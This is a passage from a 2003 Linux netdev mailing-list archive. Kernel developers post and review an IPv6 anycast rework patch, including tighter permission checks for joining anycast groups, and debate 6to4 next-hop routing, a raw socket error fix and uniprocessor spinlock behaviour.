-51,7 +51,7 @@ /* * Addr type * - * type - unicast | multicast | anycast + * type - unicast | multicast * scope - local | site | global * v4 - compat * v4mapped @@ -63,7 +63,6 @@ #define IPV6_ADDR_UNICAST 0x0001U #define IPV6_ADDR_MULTICAST 0x0002U -#define IPV6_ADDR_ANYCAST 0x0004U #define IPV6_ADDR_LOOPBACK 0x0010U #define IPV6_ADDR_LINKLOCAL 0x0020U diff -Nru a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c --- a/net/ipv6/addrconf.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/addrconf.c Thu Jul 17 06:13:09 2003 @@ -209,15 +209,8 @@ }; return type; } - /* check for reserved anycast addresses */ - - if ((st & htonl(0xE0000000)) && - ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && - (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || - (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0))) - type = IPV6_ADDR_ANYCAST; - else - type = IPV6_ADDR_UNICAST; + + type = IPV6_ADDR_UNICAST; /* Consider all addresses with the first three bits different of 000 and 111 as finished. @@ -2552,7 +2545,7 @@ switch (event) { case RTM_NEWADDR: - ip6_rt_addr_add(&ifp->addr, ifp->idev->dev); + ip6_rt_addr_add(&ifp->addr, ifp->idev->dev, 0); break; case RTM_DELADDR: addrconf_leave_solict(ifp->idev->dev, &ifp->addr); diff -Nru a/net/ipv6/anycast.c b/net/ipv6/anycast.c --- a/net/ipv6/anycast.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/anycast.c Thu Jul 17 06:13:09 2003 @@ -96,6 +96,13 @@ return onlink; } +static inline ipv6_reserved_anycast(const struct in6_addr *addr) +{ + return (addr->s6_addr32[0] & htonl(0xE0000000)) && + ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && + (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || + (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0)); +} /* * socket join an anycast group @@ -112,6 +119,8 @@ if (ipv6_addr_type(addr) & IPV6_ADDR_MULTICAST) return -EINVAL; + if (ipv6_chk_addr(addr, NULL)) + return -EINVAL; pac = sock_kmalloc(sk, sizeof(struct ipv6_ac_socklist), GFP_KERNEL); if (pac == NULL) @@ -172,8 +181,7 @@ err = -EPERM; if (err) goto out_dev_put; - } else if (!(ipv6_addr_type(addr) & IPV6_ADDR_ANYCAST) && - !capable(CAP_NET_ADMIN)) { + } else if (!ipv6_reserved_anycast(addr) && !capable(CAP_NET_ADMIN)) { err = -EPERM; goto out_dev_put; } @@ -347,7 +355,7 @@ idev->ac_list = aca; write_unlock_bh(&idev->lock); - ip6_rt_addr_add(&aca->aca_addr, dev); + ip6_rt_addr_add(&aca->aca_addr, dev, 1); addrconf_join_solict(dev, &aca->aca_addr); diff -Nru a/net/ipv6/icmp.c b/net/ipv6/icmp.c --- a/net/ipv6/icmp.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/icmp.c Thu Jul 17 06:13:09 2003 @@ -415,8 +415,7 @@ saddr = &skb->nh.ipv6h->daddr; - if (ipv6_addr_type(saddr) & IPV6_ADDR_MULTICAST || - ipv6_chk_acast_addr(0, saddr)) + if (!ipv6_unicast_destination(skb)) saddr = NULL; memcpy(&tmp_hdr, icmph, sizeof(tmp_hdr)); diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c --- a/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 @@ -785,8 +785,7 @@ ipv6_addr_all_nodes(&maddr); ndisc_send_na(dev, NULL, &maddr, &ifp->addr, ifp->idev->cnf.forwarding, 0, - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, - 1); + 1, 1); in6_ifa_put(ifp); return; } @@ -809,8 +808,7 @@ if (neigh || !dev->hard_header) { ndisc_send_na(dev, neigh, saddr, &ifp->addr, ifp->idev->cnf.forwarding, 1, - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, - 1); + 1, 1); if (neigh) neigh_release(neigh); } diff -Nru a/net/ipv6/route.c b/net/ipv6/route.c --- a/net/ipv6/route.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/route.c Thu Jul 17 06:13:09 2003 @@ -1256,7 +1256,7 @@ * Add address */ -int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev) +int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev, int anycast) { struct rt6_info *rt = ip6_dst_alloc(); @@ -1275,6 +1275,8 @@ rt->u.dst.obsolete = -1; rt->rt6i_flags = RTF_UP | RTF_NONEXTHOP; + if (!anycast) + rt->rt6i_flags |= RTF_LOCAL; rt->rt6i_nexthop = ndisc_get_neigh(rt->rt6i_dev, &rt->rt6i_gateway); if (rt->rt6i_nexthop == NULL) { dst_free((struct dst_entry *) rt); diff -Nru a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c --- a/net/ipv6/tcp_ipv6.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/tcp_ipv6.c Thu Jul 17 06:13:09 2003 @@ -971,7 +971,7 @@ if (th->rst) return; - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) + if (!ipv6_unicast_destination(skb)) return; /* @@ -1175,8 +1175,7 @@ if (skb->protocol == htons(ETH_P_IP)) return tcp_v4_conn_request(sk, skb); - /* FIXME: do the same check for anycast */ - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) + if (!ipv6_unicast_destination(skb)) goto drop; /* From krkumar@us.ibm.com Wed Jul 16 19:29:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:29:17 -0700 (PDT) Received: from over.ny.us.ibm.com (over.ny.us.ibm.com [32.97.182.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2TBFl012128 for ; Wed, 16 Jul 2003 19:29:12 -0700 Received: from e4.ny.us.ibm.com (e4.esmtp.ibm.com [9.14.6.104]) by pokfb.esmtp.ibm.com (8.12.9/8.12.2) with ESMTP id h6H0GPNu113898 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK) for ; Wed, 16 Jul 2003 20:16:27 -0400 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6H06PwO176178; Wed, 16 Jul 2003 20:06:25 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6H06NGH018856; Wed, 16 Jul 2003 20:06:24 -0400 Message-ID: <3F15E86F.2030707@us.ibm.com> Date: Wed, 16 Jul 2003 17:06:07 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307162341.DAA12466@dub.inr.ac.ru> In-Reply-To: <200307162341.DAA12466@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4122 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev This is sort of what I had originally, so I should be able to change it to do this quite easily. I didn't like the earlier suggestion of using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic), but having a new interface RTM_xxxIFACE sounds good to me. Thanks, - KK kuznet@ms2.inr.ac.ru wrote: > Hello! > > >>My suggestion is: >> - create L3 per-interface RTM, say, RTM_xxxIFACE. >> - provide inet_device / inet6_dev things via this RTM. >> e.g. per-interface statistics, flags etc. > > > I agree for all 100%. I understand your attitude now. > > Alexey > From davem@redhat.com Wed Jul 16 19:33:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:33:47 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2XgFl012529 for ; Wed, 16 Jul 2003 19:33:43 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA24544; Wed, 16 Jul 2003 19:23:16 -0700 Date: Wed, 16 Jul 2003 19:23:16 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: kuznet@dub.inr.ac.ru, jmorris@redhat.com, mika.liljeberg@welho.com, pekkas@netcore.fi, netdev@oss.sgi.com Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) Message-Id: <20030716192316.04117f92.davem@redhat.com> In-Reply-To: <200307170223.GAA13064@dub.inr.ac.ru> References: <200307170223.GAA13064@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4123 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 06:23:52 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > Here it is. Please, review and complain. If Pekka agrees with semantics, the patch looks sound by my eyes. From davem@redhat.com Wed Jul 16 20:03:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 20:03:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H33IFl013484 for ; Wed, 16 Jul 2003 20:03:19 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id TAA24588; Wed, 16 Jul 2003 19:53:46 -0700 Date: Wed, 16 Jul 2003 19:53:45 -0700 From: "David S. Miller" To: netdev@oss.sgi.com, linux-net@vger.kernel.org Cc: zwane@arm.linux.org.uk Subject: Fw: [PATCH][2.6] propogate rx errors from raw_rcv_skb Message-Id: <20030716195345.21b9b9fc.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4124 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Forwarded... Zwane, please posting networking patches to the "networking" lists, thanks. Begin forwarded message: Date: Wed, 16 Jul 2003 22:46:59 -0400 (EDT) From: Zwane Mwaikambo To: Linux Kernel Cc: "David S. Miller" Subject: [PATCH][2.6] propogate rx errors from raw_rcv_skb Hi David, This looks somewhat sane, ipv6 doesn't seem to need it as it always returns 0 Index: linux-2.6.0-test1-mm1/net/ipv4/raw.c =================================================================== RCS file: /build/cvsroot/linux-2.6.0-test1-mm1/net/ipv4/raw.c,v retrieving revision 1.1.1.1 diff -u -p -B -r1.1.1.1 raw.c --- linux-2.6.0-test1-mm1/net/ipv4/raw.c 16 Jul 2003 06:37:19 -0000 1.1.1.1 +++ linux-2.6.0-test1-mm1/net/ipv4/raw.c 16 Jul 2003 16:11:50 -0000 @@ -252,8 +252,7 @@ int raw_rcv(struct sock *sk, struct sk_b skb_push(skb, skb->data - skb->nh.raw); - raw_rcv_skb(sk, skb); - return 0; + return raw_rcv_skb(sk, skb); } static int raw_send_hdrinc(struct sock *sk, void *from, int length, From nalkunda@egr.msu.edu Wed Jul 16 21:25:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 21:25:46 -0700 (PDT) Received: from sys14.mail.msu.edu (sys14.mail.msu.edu [35.9.75.114]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H4PYFl016011 for ; Wed, 16 Jul 2003 21:25:35 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys14.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19d0Kf-000Nqi-00; Thu, 17 Jul 2003 00:25:29 -0400 Content-Type: text/plain; charset="iso-8859-1" From: N N Ashok Organization: CSE, Michigan State University To: Krishna Kumar Subject: Re: Kernel locking up in module Date: Thu, 17 Jul 2003 00:18:10 -0400 User-Agent: KMail/1.4.3 Cc: netdev@oss.sgi.com, Stephen Hemminger References: <200307142031.15122.nalkunda@egr.msu.edu> <200307152128.34341.nalkunda@egr.msu.edu> In-Reply-To: <200307152128.34341.nalkunda@egr.msu.edu> MIME-Version: 1.0 Message-Id: <200307170018.11043.nalkunda@egr.msu.edu> Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6H4PYFl016011 X-archive-position: 4125 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev > > From what I read in "Understanding the Linux Kernel", the timer > routine that I setup is executed from the bottom half. Also in the book it > says that data structures accessed in deferrable functions (which a bottom > handler is I think), there is no need of any kind of locking/protection > required for uniprocessor machines. Also it says that if we try to acquire > a spin_lock on a uniprocessor in the kernel, then the kernel control path > that does have the lock will not get a chance to release the lock and hence > we will have a deadlock. > In this context, I am unable to understand whether I should use > locking and if so which kind. Do I need to disable the IRQs (_irq) when I > take the lock? Or do I disable the bottom halves (_bh) ? Please help me in > understanding and resolving the problem as it is required for my thesis. > > Thanks and Regards, > Ashok Hi, I understand that on uniprocessor machines, spin locks are just empty. Is that true? The code that I was looking at from include/linux/spinlock.h was (although there are 2-3 other definitions for these but they also essentially are not doing much): #define rwlock_init(lock) do { } while(0) #define read_lock(lock) (void)(lock) /* Not "unused variable". */ #define read_unlock(lock) do { } while(0) #define write_lock(lock) (void)(lock) /* Not "unused variable". */ #define write_unlock(lock) do { } while(0) Can somebody confirm this? If so then how do we protect data structures in kernel control paths? Thanks, Ashok From pekkas@netcore.fi Wed Jul 16 23:51:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 23:51:11 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H6p4Fl019826 for ; Wed, 16 Jul 2003 23:51:05 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6H6onU01703; Thu, 17 Jul 2003 09:50:49 +0300 Date: Thu, 17 Jul 2003 09:50:49 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307170003.EAA12843@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4126 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > ping did, does and will work and I do not understand what you want > to say or ask. Do you want to know how it works? > > Well, IPv6 stack looks up the address in routing tables, finds the route, > sees that it is on-link, sends NDISC, receiver replies, we create a frame > and send the echo request. To continue? :-) (Sorry, it seems I've caused a lot of confusion in some parts of this thread by typoeing link-local address when I used link-layer address.. sorry) So, assume you have 3FFE:FFFF:A:B::/64 prefix on link. On a host on that link, you've manually configured the next-hop to be the router on that link, 3FFE:FFFF:A:B::1. The procedure to obtain the knowledge on where to send packets whose next-hop is 3FFE:FFFF:A:B::1 seems quite simple, similar to ping6. As to obtaining the link-*local* address, there are several procedures none of which I would recomment. Checking the source address of a ND packet (e.g. in the ping6 example above), or using a protocol like ICMP name information queries (draft-ietf-ipngwg-icmp-name-lookups-10.txt). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From pekkas@netcore.fi Thu Jul 17 00:04:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 00:04:55 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H74nFl020476 for ; Thu, 17 Jul 2003 00:04:50 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6H74XO01808; Thu, 17 Jul 2003 10:04:33 +0300 Date: Thu, 17 Jul 2003 10:04:33 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307170020.EAA12924@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4127 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > Yes, I dare to say that they're a requirement. > > Nope. IPv6 host routing is based on assumption of link-locality of the > next hop. Probably, you want to read some rfcs or to look into code. This is not correct. Perhaps the RFC's have changed in the meantime, but at least RFC2461 does *not* make such an assumption (AFAICS). In the document, there is a basic assumption that the next-hop is *on-link*. In the document, there are assumptions on verifying whether the redirects come from the router you're currently using: this is simpler when you use only link-locals as next-hops, but it is certainly *NOT* a requirement. (The spec in question will be revised in the short term, so I'll take this issue up for clarification..) > > specifications use and the *users* want and need to use. > > Sigh, there no specifications about tricks used by Linux routing tables, > *users* are unlikely to want to use this feature at all, as Mika noticed. > And when they want, they want to right: > > ip route add 3ffe::.... via 193.233.7.65 That would be simpler but, we actually require: ip route add 3ffe::... via ::193.233.7.65 and thus require a route for ::/96. That's confusing: ::/96 has a very specific purpose in RFCs, and we should not be overloading the functionality, it's just plain confusing. > rather than crap sort of > > ip route add 3ffe::.... via 2002: I'm not saying we need to prevent the users from using the former. I'm just saying that we must not prevent the users from using the latter; please check e.g. the RFC3068 section 2.5. If we don't support something like that, it'll just confuse the users more. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 01:37:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 01:37:34 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H8bMFl024561 for ; Thu, 17 Jul 2003 01:37:24 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6H8csLH024150; Thu, 17 Jul 2003 11:38:54 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6H8crJg024149; Thu, 17 Jul 2003 11:38:53 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: kuznet , davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <200307170223.GAA13064@dub.inr.ac.ru> References: <200307170223.GAA13064@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058431132.5781.32.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 11:38:53 +0300 X-archive-position: 4128 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Alexey, On Thu, 2003-07-17 at 05:23, kuznet@ms2.inr.ac.ru wrote: > diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c > --- a/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 > +++ b/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 > @@ -785,8 +785,7 @@ > ipv6_addr_all_nodes(&maddr); > ndisc_send_na(dev, NULL, &maddr, &ifp->addr, > ifp->idev->cnf.forwarding, 0, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > in6_ifa_put(ifp); > return; > } > @@ -809,8 +808,7 @@ > if (neigh || !dev->hard_header) { > ndisc_send_na(dev, neigh, saddr, &ifp->addr, > ifp->idev->cnf.forwarding, 1, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > if (neigh) > neigh_release(neigh); > } I'm not sure you can just remove these. It seems possible (?) to have the anycast address configured on one of the interfaces as a unicast at the same time. I.e., one of the anycast members could own the address. For what it's worth, I think you have the right semantics. MikaL From kuznet@ms2.inr.ac.ru Thu Jul 17 02:06:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:06:57 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H96nFl025605 for ; Thu, 17 Jul 2003 02:06:50 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id NAA13688; Thu, 17 Jul 2003 13:06:37 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170906.NAA13688@dub.inr.ac.ru> Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 13:06:37 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <1058431132.5781.32.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 11:38:53 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4129 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > I'm not sure you can just remove these. It seems possible (?) to have > the anycast address configured on one of the interfaces as a unicast at > the same time. I.e., one of the anycast members could own the address. They cannot intersect, otherwise RTF_LOCAL thing will not work. I deliberately blocked attempt to add a local address as anycast in anycast.c, see another chunk. But even that check is not necessary: non-superuser may listen only for reserved unicasts, which are excluded from allowed local addresses by policy. Kernel does not need even to worry about this. Actually, the test in ndisc.c was bogus by another reason: inet_addr_type() checks only for reserved anycasts and non-reserved unicasts, which would conflict with local addresses, were not detected in any case. Alexey From kuznet@ms2.inr.ac.ru Thu Jul 17 02:13:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:13:31 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H9DKFl026099 for ; Thu, 17 Jul 2003 02:13:21 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12924; Thu, 17 Jul 2003 04:20:46 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170020.EAA12924@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Thu, 17 Jul 2003 04:20:46 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 16, 2003 09:12:04 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4130 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Yes, I dare to say that they're a requirement. Nope. IPv6 host routing is based on assumption of link-locality of the next hop. Probably, you want to read some rfcs or to look into code. > the user space tools' problem: i.e. make them resolve a globally addressed > nexthop to a link-local nexthop. Impossible, as I said. [ NOTE, the subject changed back to correct one at this point. Seems, one sentence, written by me has grown to some huge tumor eating original one completely. :-) ] > specifications use and the *users* want and need to use. Sigh, there no specifications about tricks used by Linux routing tables, *users* are unlikely to want to use this feature at all, as Mika noticed. And when they want, they want to right: ip route add 3ffe::.... via 193.233.7.65 rather than crap sort of ip route add 3ffe::.... via 2002: I do not understand, what the hell is going on with you. I am already sorry that started this. :-) Alexey From mika.liljeberg@welho.com Thu Jul 17 02:31:00 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 02:31:04 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H9UwFl028163 for ; Thu, 17 Jul 2003 02:30:59 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6H9WXLH024342; Thu, 17 Jul 2003 12:32:34 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6H9WXox024341; Thu, 17 Jul 2003 12:32:33 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: davem@redhat.com, jmorris@redhat.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: <200307170906.NAA13688@dub.inr.ac.ru> References: <200307170906.NAA13688@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058434352.5780.44.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 12:32:33 +0300 X-archive-position: 4131 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 12:06, kuznet@ms2.inr.ac.ru wrote: > They cannot intersect, otherwise RTF_LOCAL thing will not work. > > I deliberately blocked attempt to add a local address as anycast > in anycast.c, see another chunk. Ok, I missed that one. I guess it's safe to assume that the anycast and unicast spaces will not intersect, even though the addresses are allocated from the same range. I was wondering how to dynamically assign anycast addresses. In theory one could abuse the unicast address assignment mechanisms (in the absence of anything else users might be tempted to try this). But that's a different issue. MikaL From pekkas@netcore.fi Thu Jul 17 03:41:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 03:42:01 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HAfkFl000334 for ; Thu, 17 Jul 2003 03:41:49 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6HAfWD04440; Thu, 17 Jul 2003 13:41:32 +0300 Date: Thu, 17 Jul 2003 13:41:31 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: Mika Liljeberg , , , , Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast In-Reply-To: <200307171030.OAA13906@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4132 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > Wait a second. What the hell is this in anycast.c? How is it possible > to allow to any user to create reserved anycast? > This makes them completely useless, everyone on LAN can join > anycast service and blackhole it, which will prevent listening by real servers. > > This cannot be right. I think the logic is illegally stolen > from multicast interface: only superuser calls can create/delete anycasts. > Non-superuser can only listen existing one. > > I would block JOIN/LEAVE for non-superuser completely. No user should be able to join anycast group, IMHO. (Of course, that hasn't been specifed anywhere, but the implementations should do what they think is best -- and I certainly think this is.) -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 04:14:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 04:15:05 -0700 (PDT) Received: from hades.pp.htv.fi 